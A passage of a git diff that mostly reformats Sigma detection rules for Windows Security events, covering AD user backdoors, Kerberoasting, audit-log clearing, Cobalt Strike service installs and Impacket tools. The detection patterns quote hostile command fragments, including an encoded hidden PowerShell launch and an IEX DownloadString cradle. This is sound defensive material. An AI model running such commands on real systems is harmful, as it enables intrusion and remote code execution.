a/sigma/builtin/security/win_security_add_remove_computer.yml +++ b/sigma/builtin/security/win_security_add_remove_computer.yml @@ -1,8 +1,7 @@ title: Add or Remove Computer from DC id: 20d96d95-5a20-4cf1-a483-f3bda8a7c037 status: test -description: Detects the creation or removal of a computer. Can be used to detect - attacks such as DCShadow via the creation of a new SPN. +description: Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN. references: - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741 diff --git a/sigma/builtin/security/win_security_admin_share_access.yml b/sigma/builtin/security/win_security_admin_share_access.yml index 802c0597f..3b816fb0b 100644 --- a/sigma/builtin/security/win_security_admin_share_access.yml +++ b/sigma/builtin/security/win_security_admin_share_access.yml @@ -11,8 +11,7 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit File Share" - must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit File Share" must be configured for Success/Failure detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_alert_active_directory_user_control.yml b/sigma/builtin/security/win_security_alert_active_directory_user_control.yml index 0d6ceea37..adc0d588b 100644 --- a/sigma/builtin/security/win_security_alert_active_directory_user_control.yml +++ b/sigma/builtin/security/win_security_alert_active_directory_user_control.yml @@ -1,8 +1,7 @@ title: Enabled User Right in AD to Control User Objects id: 311b6ce2-7890-4383-a8c2-663a9f6b43cd status: test -description: Detects scenario where if a user is assigned the SeEnableDelegationPrivilege - right in Active Directory it would allow control of other AD user objects. +description: Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects. references: - https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ author: '@neu5ron' @@ -14,10 +13,7 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : Policy Change > Audit Authorization - Policy Change, Group Policy : Computer Configuration\Windows Settings\Security - Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit - Authorization Policy Change' + definition: 'Requirements: Audit Policy : Policy Change > Audit Authorization Policy Change, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change' detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_alert_ad_user_backdoors.yml b/sigma/builtin/security/win_security_alert_ad_user_backdoors.yml index e3fcdb2d3..9d74f6581 100644 --- a/sigma/builtin/security/win_security_alert_ad_user_backdoors.yml +++ b/sigma/builtin/security/win_security_alert_ad_user_backdoors.yml @@ -1,8 +1,7 @@ title: Active Directory User Backdoors id: 300bac00-e041-4ee2-9c36-e262656a6ecc status: test -description: Detects scenarios where one can control another users or computers account - without having to use their credentials. +description: Detects scenarios where one can control another users or computers account without having to use their credentials. references: - https://msdn.microsoft.com/en-us/library/cc220234.aspx - https://adsecurity.org/?p=3466 @@ -16,21 +15,15 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : Account Management > Audit User Account - Management, Group Policy : Computer Configuration\Windows Settings\Security - Settings\Advanced Audit Policy Configuration\Audit Policies\Account Management\Audit - User Account Management, DS Access > Audit Directory Service Changes, Group - Policy : Computer Configuration\Windows Settings\Security Settings\Advanced - Audit Policy Configuration\Audit Policies\DS Access\Audit Directory Service - Changes' + definition: 'Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Account Management\Audit User Account Management, DS Access > Audit Directory Service Changes, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\DS Access\Audit Directory Service Changes' detection: security: Channel: Security selection1: EventID: 4738 filter_null: - - AllowedToDelegateTo: '-' - - AllowedToDelegateTo: null + - AllowedToDelegateTo: '-' + - AllowedToDelegateTo: selection_5136_1: EventID: 5136 AttributeLDAPDisplayName: msDS-AllowedToDelegateTo diff --git a/sigma/builtin/security/win_security_alert_enable_weak_encryption.yml b/sigma/builtin/security/win_security_alert_enable_weak_encryption.yml index 55d75e109..20e4fe9e0 100644 --- a/sigma/builtin/security/win_security_alert_enable_weak_encryption.yml +++ b/sigma/builtin/security/win_security_alert_enable_weak_encryption.yml @@ -1,8 +1,7 @@ title: Weak Encryption Enabled and Kerberoast id: f6de9536-0441-4b3f-a646-f4e00f300ffd status: test -description: Detects scenario where weak encryption is enabled for a user profile - which could be used for hash/password cracking. +description: Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking. references: - https://adsecurity.org/?p=2053 - https://blog.harmj0y.net/redteaming/another-word-on-delegation/ @@ -15,16 +14,18 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : Account Management > Audit User Account - Management, Group Policy : Computer Configuration\Windows Settings\Security - Settings\Advanced Audit Policy Configuration\Audit Policies\Account Management\Audit - User Account Management' + definition: 'Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Account Management\Audit User Account Management' detection: security: Channel: Security selection: EventID: 4738 - olduac_des: + # According to Microsoft, the bit values are listed here: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 + # However, that seems to be a simple copy from https://docs.microsoft.com/en-US/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties + # and the actual flags that are used are quite different and, unfortunately, not documented. + # https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/ contains a number of EVTX files with relevant events, which can be used to extract + # the following values. + olduac_des: # 0x8000 OldUacValue|endswith: - 8??? - 9??? @@ -44,7 +45,7 @@ detection: - D??? - E??? - F??? - olduac_preauth: + olduac_preauth: # 0x10000 OldUacValue|endswith: - 1???? - 3???? @@ -64,7 +65,7 @@ detection: - B???? - D???? - F???? - olduac_encrypted: + olduac_encrypted: # 0x800 OldUacValue|endswith: - 8?? - 9?? @@ -84,8 +85,7 @@ detection: - D?? - E?? - F?? - condition: security and (selection and ((newuac_des and not olduac_des) or (newuac_preauth - and not olduac_preauth) or (newuac_encrypted and not olduac_encrypted))) + condition: security and (selection and ((newuac_des and not olduac_des) or (newuac_preauth and not olduac_preauth) or (newuac_encrypted and not olduac_encrypted))) falsepositives: - Unknown level: high diff --git a/sigma/builtin/security/win_security_atsvc_task.yml b/sigma/builtin/security/win_security_atsvc_task.yml index 2712533c9..20f8f6719 100644 --- a/sigma/builtin/security/win_security_atsvc_task.yml +++ b/sigma/builtin/security/win_security_atsvc_task.yml @@ -1,8 +1,7 @@ title: Remote Task Creation via ATSVC Named Pipe id: f6de6525-4509-495a-8a82-1f8b0ed73a00 status: test -description: Detects remote task creation via at.exe or API interacting with ATSVC - namedpipe +description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe references: - https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html author: Samir Bousseaden @@ -17,14 +16,13 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Detailed - File Share" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure detection: security: Channel: Security selection: EventID: 5145 - ShareName: \\\\\*\\IPC$ + ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$ RelativeTargetName: atsvc Accesses|contains: WriteData condition: security and selection diff --git a/sigma/builtin/security/win_security_audit_log_cleared.yml b/sigma/builtin/security/win_security_audit_log_cleared.yml index f4c8d986d..2bebcf1e8 100644 --- a/sigma/builtin/security/win_security_audit_log_cleared.yml +++ b/sigma/builtin/security/win_security_audit_log_cleared.yml @@ -1,13 +1,12 @@ title: Security Eventlog Cleared id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 related: - - id: f2f01843-e7b8-4f95-a35a-d23584476423 - type: obsoletes - - id: a122ac13-daf8-4175-83a2-72c387be339d - type: obsoletes + - id: f2f01843-e7b8-4f95-a35a-d23584476423 + type: obsoletes + - id: a122ac13-daf8-4175-83a2-72c387be339d + type: obsoletes status: test -description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil - cl" command execution +description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution references: - https://twitter.com/deviouspolack/status/832535435960209408 - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 @@ -33,8 +32,7 @@ detection: Provider_Name: Microsoft-Windows-Eventlog condition: security and (1 of selection_*) falsepositives: - - Rollout of log collection agents (the setup routine often includes a reset of - the local Eventlog) + - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - System provisioning (system reset before the golden image creation) level: high ruletype: Sigma diff --git a/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml b/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml index c21dfb17c..f4330b8bd 100644 --- a/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml +++ b/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml @@ -1,11 +1,10 @@ title: CobaltStrike Service Installations - Security id: d7a95147-145f-4678-b85d-d1ff4a3bb3f6 related: - - id: 5a105d34-05fc-401e-8553-272b45c1522d - type: derived + - id: 5a105d34-05fc-401e-8553-272b45c1522d + type: derived status: test -description: Detects known malicious service installs that appear in cases in which - a Cobalt Strike beacon elevates privileges or lateral movement +description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement references: - https://www.sans.org/webcasts/119395 - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ @@ -23,8 +22,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security @@ -42,7 +40,7 @@ detection: selection3: ServiceFileName|contains: powershell -nop -w hidden -encodedcommand selection4: - ServiceFileName|base64offset|contains: 'IEX (New-Object Net.Webclient).DownloadString(''http://127.0.0.1:' + ServiceFileName|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" condition: security and (event_id and 1 of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/security/win_security_codeintegrity_check_failure.yml b/sigma/builtin/security/win_security_codeintegrity_check_failure.yml index ac9f6ed33..b5777a689 100644 --- a/sigma/builtin/security/win_security_codeintegrity_check_failure.yml +++ b/sigma/builtin/security/win_security_codeintegrity_check_failure.yml @@ -1,10 +1,8 @@ title: Failed Code Integrity Checks id: 470ec5fa-7b4e-4071-b200-4c753100f49b status: stable -description: 'Detects code integrity failures such as missing page hashes or corrupted - drivers due unauthorized modification. This could be a sign of tampered binaries. - - ' +description: | + Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries. author: Thomas Patzke date: 2019/12/03 modified: 2023/12/13 diff --git a/sigma/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml b/sigma/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml index 1878a409d..cdf71e09a 100644 --- a/sigma/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml +++ b/sigma/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml @@ -1,9 +1,7 @@ title: DCERPC SMB Spoolss Named Pipe id: 214e8f95-100a-4e04-bb31-ef6cba8ce07e status: test -description: Detects the use of the spoolss named pipe over SMB. This can be used - to trigger the authentication via NTLM of any machine that has the spoolservice - enabled. +description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled. references: - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1 - https://dirkjanm.io/a-different-way-of-abusing-zerologon/ @@ -22,7 +20,7 @@ detection: Channel: Security selection: EventID: 5145 - ShareName: \\\\\*\\IPC$ + ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$ RelativeTargetName: spoolss condition: security and selection falsepositives: diff --git a/sigma/builtin/security/win_security_dcom_iertutil_dll_hijack.yml b/sigma/builtin/security/win_security_dcom_iertutil_dll_hijack.yml index bf8875b68..ee124c24c 100644 --- a/sigma/builtin/security/win_security_dcom_iertutil_dll_hijack.yml +++ b/sigma/builtin/security/win_security_dcom_iertutil_dll_hijack.yml @@ -1,9 +1,7 @@ title: DCOM InternetExplorer.Application Iertutil DLL Hijack - Security id: c39f0c81-7348-4965-ab27-2fde35a1b641 status: test -description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program - Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer - DLL Hijack scenario. +description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario. references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR) diff --git a/sigma/builtin/security/win_security_disable_event_auditing.yml b/sigma/builtin/security/win_security_disable_event_auditing.yml index ee9bef55e..7f1d92d9d 100644 --- a/sigma/builtin/security/win_security_disable_event_auditing.yml +++ b/sigma/builtin/security/win_security_disable_event_auditing.yml @@ -1,24 +1,14 @@ title: Windows Event Auditing Disabled id: 69aeb277-f15f-4d2d-b32a-55e883609563 related: - - id: ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1 - type: derived + - id: ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1 + type: derived status: test -description: 'Detects scenarios where system auditing (i.e.: Windows event log auditing) - is disabled. - - This may be used in a scenario where an entity would want to bypass local logging - to evade detection when Windows event logging is enabled and reviewed. - - Also, it is recommended to turn off "Local Group Policy Object Processing" via - GPO, which will make sure that Active Directory GPOs take precedence over local/edited - computer policies via something such as "gpedit.msc". - - Please note, that disabling "Local Group Policy Object Processing" may cause an - issue in scenarios of one off specific GPO modifications - however, it is recommended - to perform these modifications in Active Directory anyways. - - ' +description: | + Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled. + This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed. + Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc". + Please note, that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways. references: - https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit author: '@neu5ron, Nasreddine Bencherchali (Nextron Systems)' @@ -37,27 +27,28 @@ detection: selection: EventID: 4719 AuditPolicyChanges|contains: - - '%%8448' - - '%%8450' + - '%%8448' # This is "Success removed" + - '%%8450' # This is "Failure removed" filter_main_guid: + # Note: We filter these GUID to avoid alert duplication as these are covered by ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1 SubcategoryGuid: - - '{0CCE9210-69AE-11D9-BED3-505054503030}' - - '{0CCE9211-69AE-11D9-BED3-505054503030}' - - '{0CCE9212-69AE-11D9-BED3-505054503030}' - - '{0CCE9215-69AE-11D9-BED3-505054503030}' - - '{0CCE9217-69AE-11D9-BED3-505054503030}' - - '{0CCE921B-69AE-11D9-BED3-505054503030}' - - '{0CCE922B-69AE-11D9-BED3-505054503030}' - - '{0CCE922F-69AE-11D9-BED3-505054503030}' - - '{0CCE9230-69AE-11D9-BED3-505054503030}' - - '{0CCE9235-69AE-11D9-BED3-505054503030}' - - '{0CCE9236-69AE-11D9-BED3-505054503030}' - - '{0CCE9237-69AE-11D9-BED3-505054503030}' - - '{0CCE923F-69AE-11D9-BED3-505054503030}' - - '{0CCE9240-69AE-11D9-BED3-505054503030}' - - '{0CCE9242-69AE-11D9-BED3-505054503030}' + - '{0CCE9210-69AE-11D9-BED3-505054503030}' # Audit Security State Change + - '{0CCE9211-69AE-11D9-BED3-505054503030}' # Audit Security System Extension + - '{0CCE9212-69AE-11D9-BED3-505054503030}' # Audit System Integrity + - '{0CCE9215-69AE-11D9-BED3-505054503030}' # Audit Logon + - '{0CCE9217-69AE-11D9-BED3-505054503030}' # Audit Account Lockout + - '{0CCE921B-69AE-11D9-BED3-505054503030}' # Audit Special Logon + - '{0CCE922B-69AE-11D9-BED3-505054503030}' # Audit Process Creation + - '{0CCE922F-69AE-11D9-BED3-505054503030}' # Audit Audit Policy Change + - '{0CCE9230-69AE-11D9-BED3-505054503030}' # Audit Authentication Policy Change + - '{0CCE9235-69AE-11D9-BED3-505054503030}' # Audit User Account Management + - '{0CCE9236-69AE-11D9-BED3-505054503030}' # Audit Computer Account Management + - '{0CCE9237-69AE-11D9-BED3-505054503030}' # Audit Security Group Management + - '{0CCE923F-69AE-11D9-BED3-505054503030}' # Audit Credential Validation + - '{0CCE9240-69AE-11D9-BED3-505054503030}' # Audit Kerberos Service Ticket Operations + - '{0CCE9242-69AE-11D9-BED3-505054503030}' # Audit Kerberos Authentication Service' condition: security and (selection and not 1 of filter_main_*) falsepositives: - Unknown -level: low +level: low # Increase this after a testing period in your environment ruletype: Sigma diff --git a/sigma/builtin/security/win_security_disable_event_auditing_critical.yml b/sigma/builtin/security/win_security_disable_event_auditing_critical.yml index edefc9ec5..36c320b8d 100644 --- a/sigma/builtin/security/win_security_disable_event_auditing_critical.yml +++ b/sigma/builtin/security/win_security_disable_event_auditing_critical.yml @@ -1,11 +1,10 @@ title: Important Windows Event Auditing Disabled id: ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1 related: - - id: 69aeb277-f15f-4d2d-b32a-55e883609563 - type: derived + - id: 69aeb277-f15f-4d2d-b32a-55e883609563 + type: derived status: test -description: Detects scenarios where system auditing for important events such as - "Process Creation" or "Logon" events is disabled. +description: Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled. references: - https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit - https://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md @@ -25,26 +24,27 @@ detection: selection_state_success_and_failure: EventID: 4719 SubcategoryGuid: - - '{0CCE9210-69AE-11D9-BED3-505054503030}' - - '{0CCE9211-69AE-11D9-BED3-505054503030}' - - '{0CCE9212-69AE-11D9-BED3-505054503030}' - - '{0CCE9215-69AE-11D9-BED3-505054503030}' - - '{0CCE921B-69AE-11D9-BED3-505054503030}' - - '{0CCE922B-69AE-11D9-BED3-505054503030}' - - '{0CCE922F-69AE-11D9-BED3-505054503030}' - - '{0CCE9230-69AE-11D9-BED3-505054503030}' - - '{0CCE9235-69AE-11D9-BED3-505054503030}' - - '{0CCE9236-69AE-11D9-BED3-505054503030}' - - '{0CCE9237-69AE-11D9-BED3-505054503030}' - - '{0CCE923F-69AE-11D9-BED3-505054503030}' - - '{0CCE9240-69AE-11D9-BED3-505054503030}' - - '{0CCE9242-69AE-11D9-BED3-505054503030}' + # Note: Add or remove GUID as you see fit in your env + - '{0CCE9210-69AE-11D9-BED3-505054503030}' # Audit Security State Change + - '{0CCE9211-69AE-11D9-BED3-505054503030}' # Audit Security System Extension + - '{0CCE9212-69AE-11D9-BED3-505054503030}' # Audit System Integrity + - '{0CCE9215-69AE-11D9-BED3-505054503030}' # Audit Logon + - '{0CCE921B-69AE-11D9-BED3-505054503030}' # Audit Special Logon + - '{0CCE922B-69AE-11D9-BED3-505054503030}' # Audit Process Creation + - '{0CCE922F-69AE-11D9-BED3-505054503030}' # Audit Audit Policy Change + - '{0CCE9230-69AE-11D9-BED3-505054503030}' # Audit Authentication Policy Change + - '{0CCE9235-69AE-11D9-BED3-505054503030}' # Audit User Account Management + - '{0CCE9236-69AE-11D9-BED3-505054503030}' # Audit Computer Account Management + - '{0CCE9237-69AE-11D9-BED3-505054503030}' # Audit Security Group Management + - '{0CCE923F-69AE-11D9-BED3-505054503030}' # Audit Credential Validation + - '{0CCE9240-69AE-11D9-BED3-505054503030}' # Audit Kerberos Service Ticket Operations + - '{0CCE9242-69AE-11D9-BED3-505054503030}' # Audit Kerberos Authentication Service AuditPolicyChanges|contains: - - '%%8448' - - '%%8450' + - '%%8448' # This is "Success removed" + - '%%8450' # This is "Failure removed" selection_state_success_only: EventID: 4719 - SubcategoryGuid: '{0CCE9217-69AE-11D9-BED3-505054503030}' + SubcategoryGuid: '{0CCE9217-69AE-11D9-BED3-505054503030}' # Audit Account Lockout AuditPolicyChanges|contains: '%%8448' condition: security and (1 of selection_*) falsepositives: diff --git a/sigma/builtin/security/win_security_dot_net_etw_tamper.yml b/sigma/builtin/security/win_security_dot_net_etw_tamper.yml index fdd3790a6..4710c882e 100644 --- a/sigma/builtin/security/win_security_dot_net_etw_tamper.yml +++ b/sigma/builtin/security/win_security_dot_net_etw_tamper.yml @@ -1,8 +1,8 @@ title: ETW Logging Disabled In .NET Processes - Registry id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc related: - - id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544 - type: similar + - id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544 + type: similar status: test description: Potential adversaries stopping ETW providers recording loaded .NET assemblies. references: diff --git a/sigma/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml b/sigma/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml index 5ae2ab9b4..f217c4249 100644 --- a/sigma/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml +++ b/sigma/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml @@ -1,8 +1,7 @@ title: DPAPI Domain Backup Key Extraction id: 4ac1f50b-3bd0-4968-902d-868b4647937e status: test -description: Detects tools extracting LSA secret DPAPI domain backup key from Domain - Controllers +description: Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers references: - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html author: Roberto Rodriguez @Cyb3rWard0g diff --git a/sigma/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml b/sigma/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml index a8a5cbed5..68c9cfba6 100644 --- a/sigma/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml +++ b/sigma/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml @@ -1,8 +1,7 @@ title: DPAPI Domain Master Key Backup Attempt id: 39a94fd1-8c9a-4ff6-bf22-c058762f8014 status: test -description: Detects anyone attempting a backup for the DPAPI Master Key. This events - gets generated at the source and not the Domain Controller. +description: Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller. references: - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html author: Roberto Rodriguez @Cyb3rWard0g @@ -25,7 +24,6 @@ fields: - SubjectDomainName - SubjectUserName falsepositives: - - If a computer is a member of a domain, DPAPI has a backup mechanism to allow - unprotection of the data. Which will trigger this event. + - If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event. level: medium ruletype: Sigma diff --git a/sigma/builtin/security/win_security_external_device.yml b/sigma/builtin/security/win_security_external_device.yml index 52dc0fcc2..6f52cdab3 100644 --- a/sigma/builtin/security/win_security_external_device.yml +++ b/sigma/builtin/security/win_security_external_device.yml @@ -1,8 +1,7 @@ title: External Disk Drive Or USB Storage Device id: f69a87ea-955e-4fb4-adb2-bb9fd6685632 status: test -description: Detects external diskdrives or plugged in USB devices, EventID 6416 on - Windows 10 or later +description: Detects external diskdrives or plugged in USB devices, EventID 6416 on Windows 10 or later author: Keith Wright date: 2019/11/20 modified: 2022/10/09 diff --git a/sigma/builtin/security/win_security_gpo_scheduledtasks.yml b/sigma/builtin/security/win_security_gpo_scheduledtasks.yml index 842260991..453a60fea 100644 --- a/sigma/builtin/security/win_security_gpo_scheduledtasks.yml +++ b/sigma/builtin/security/win_security_gpo_scheduledtasks.yml @@ -1,8 +1,7 @@ title: Persistence and Execution at Scale via GPO Scheduled Task id: a8f29a7b-b137-4446-80a0-b804272f3da2 status: test -description: Detect lateral movement using GPO scheduled task, usually used to deploy - ransomware at scale +description: Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale references: - https://twitter.com/menasec1/status/1106899890377052160 - https://www.secureworks.com/blog/ransomware-as-a-distraction @@ -16,21 +15,19 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Detailed - File Share" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure detection: security: Channel: Security selection: EventID: 5145 - ShareName: \\\\\*\\SYSVOL + ShareName: \\\\\*\\SYSVOL # looking for the string \\*\SYSVOL RelativeTargetName|endswith: ScheduledTasks.xml Accesses|contains: - WriteData - '%%4417' condition: security and selection falsepositives: - - If the source IP is not localhost then it's super suspicious, better to monitor - both local and remote changes to GPO scheduledtasks + - If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks level: high ruletype: Sigma diff --git a/sigma/builtin/security/win_security_hidden_user_creation.yml b/sigma/builtin/security/win_security_hidden_user_creation.yml index dafa3ae81..eda0faa7b 100644 --- a/sigma/builtin/security/win_security_hidden_user_creation.yml +++ b/sigma/builtin/security/win_security_hidden_user_creation.yml @@ -1,8 +1,7 @@ title: Hidden Local User Creation id: 7b449a5e-1db5-4dd0-a2dc-4e3a67282538 status: test -description: Detects the creation of a local hidden user account which should not - happen for event ID 4720. +description: Detects the creation of a local hidden user account which should not happen for event ID 4720. references: - https://twitter.com/SBousseaden/status/1387743867663958021 author: Christian Burkard (Nextron Systems) diff --git a/sigma/builtin/security/win_security_hktl_nofilter.yml b/sigma/builtin/security/win_security_hktl_nofilter.yml index aac99188e..6ce963cbf 100644 --- a/sigma/builtin/security/win_security_hktl_nofilter.yml +++ b/sigma/builtin/security/win_security_hktl_nofilter.yml @@ -1,10 +1,8 @@ title: HackTool - NoFilter Execution id: 7b14c76a-c602-4ae6-9717-eff868153fc0 status: experimental -description: 'Detects execution of NoFilter, a tool for abusing the Windows Filtering - Platform for privilege escalation via hardcoded policy name indicators - - ' +description: | + Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators references: - https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp - https://github.com/deepinstinct/NoFilter @@ -19,8 +17,7 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Filtering Platform Policy Change needs to be - enabled' + definition: 'Requirements: Audit Filtering Platform Policy Change needs to be enabled' detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml b/sigma/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml index e958f168e..6dd1271d8 100644 --- a/sigma/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml +++ b/sigma/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml @@ -13,8 +13,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_impacket_psexec.yml b/sigma/builtin/security/win_security_impacket_psexec.yml index f90317b74..6a0ff5225 100644 --- a/sigma/builtin/security/win_security_impacket_psexec.yml +++ b/sigma/builtin/security/win_security_impacket_psexec.yml @@ -13,14 +13,13 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Detailed - File Share" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure detection: security: Channel: Security selection1: EventID: 5145 - ShareName: \\\\\*\\IPC$ + ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$ RelativeTargetName|contains: - RemCom_stdin - RemCom_stdout diff --git a/sigma/builtin/security/win_security_impacket_secretdump.yml b/sigma/builtin/security/win_security_impacket_secretdump.yml index e26386c7f..cf0a89a64 100644 --- a/sigma/builtin/security/win_security_impacket_secretdump.yml +++ b/sigma/builtin/security/win_security_impacket_secretdump.yml @@ -15,14 +15,13 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Detailed - File Share" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure detection: security: Channel: Security selection: EventID: 5145 - ShareName: \\\\\*\\ADMIN$ + ShareName: \\\\\*\\ADMIN$ # looking for the string \\*\ADMIN$ RelativeTargetName|contains|all: - SYSTEM32\ - .tmp diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml index 21748a98c..27b6b2603 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation CLIP+ Launcher - Security id: 4edf51e1-cb83-4e1a-bc39-800e396068e3 related: - - id: f7385ee2-0e0c-11eb-adc1-0242ac120002 - type: derived + - id: f7385ee2-0e0c-11eb-adc1-0242ac120002 + type: derived status: test description: Detects Obfuscated use of Clip.exe to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 26) author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2022/11/27 @@ -15,11 +15,11 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 + logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled 